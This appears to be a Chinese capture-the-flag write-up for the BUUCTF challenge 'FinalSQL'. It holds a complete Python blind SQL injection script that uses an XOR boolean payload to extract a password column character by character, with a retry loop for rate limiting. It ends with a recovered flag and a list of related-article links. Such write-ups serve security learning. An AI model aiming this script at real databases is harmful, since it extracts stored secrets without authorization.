[极客大挑战 2019]FinalSQL1

打开题目

sql注入,点击1试一下

点击2试一下

点击3试一下

点击4

点击5

id=6试一下

感觉是sql盲注了

编写脚本

import requests

import string

from time import sleep

url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0\^({})"

如果为真时的关键字匹配

base = 'Click others'

盲注的字符集

chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"

for i in range(1, 1000):

continue_ = False

for c in chars:

u = url.format(inject.format(i,ord(c)))

res = requests.get(u)

while res.status_code == 429:

sleep(1)

res = requests.get(u)

if base in res.text:

print(c,end='',flush=True)

continue_ = True

break

if not continue_:

break(参考博客)

得到flag倒序,更正为

得到flag

flag{87c0b617-4e80-4135-b08c-ad013c856e27}

相关推荐
浩浩测试一下20 分钟前
SQL注入高级绕过手法汇总 重点
数据库·sql·安全·web安全·网络安全·oracle·安全架构
獨枭1 小时前
SQL Server 2019 安装与配置详细教程
sql·sqlserver
帅云毅3 小时前
Web漏洞--XSS之订单系统和Shell箱子
前端·笔记·web安全·php·xss
bing_1583 小时前
在 Spring Boot 项目中如何使用索引来优化 SQL 查询?
spring boot·sql·索引优化
husterlichf4 小时前
MYSQL 常用字符串函数 和 时间函数详解
数据库·sql·mysql
什么芮.4 小时前
spark-streaming
pytorch·sql·spark·kafka·scala
迷路的小绅士4 小时前
常见网络安全攻击类型深度剖析(三):DDoS攻击——分类、攻击机制及企业级防御策略
网络·web安全·ddos
ALe要立志成为web糕手6 小时前
[BJDCTF2020]EzPHP
web安全·网络安全·php·ctf
迷路的小绅士7 小时前
常见网络安全攻击类型深度剖析(四):跨站脚本攻击(XSS)——分类、漏洞利用与前端安全防护
前端·安全·web安全
husterlichf7 小时前
MYSQL 常用数值函数 和 条件函数 详解
数据库·sql·mysql